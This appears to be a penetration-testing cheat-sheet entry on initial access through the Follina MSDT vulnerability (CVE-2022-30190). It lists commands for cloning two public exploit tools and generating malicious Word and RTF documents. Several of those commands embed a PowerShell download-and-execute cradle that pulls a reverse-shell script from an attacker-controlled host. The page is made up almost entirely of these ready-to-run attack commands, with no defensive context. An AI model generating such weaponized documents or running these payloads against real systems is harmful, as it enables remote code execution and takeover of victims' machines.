Initial Access
MS-MSDT Follina [CVE-2022-30190]
Exploit
## ------------------| JohnHammond
git clone https://github.com/JohnHammond/msdt-follina
python3 follina.py -o exploit.doc -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
## ------------------| chvancooten
git clone git clone https://github.com/chvancooten/follina.py
## Execute a local binary
python3 follina.py -t docx -m binary -b \windows\system32\calc.exe
## On linux you may have to escape backslashes
python3 follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe
## RevShell
python3 follina.py -t rtf -m command -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"Scheme
Last updated